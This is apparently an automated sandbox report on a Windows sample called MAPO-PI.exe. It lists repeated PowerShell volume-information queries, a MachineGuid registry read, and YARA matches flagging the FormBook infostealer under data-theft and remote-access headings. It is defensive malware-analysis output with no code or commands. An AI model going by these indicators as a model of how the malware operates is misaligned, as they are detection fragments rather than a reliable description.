Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY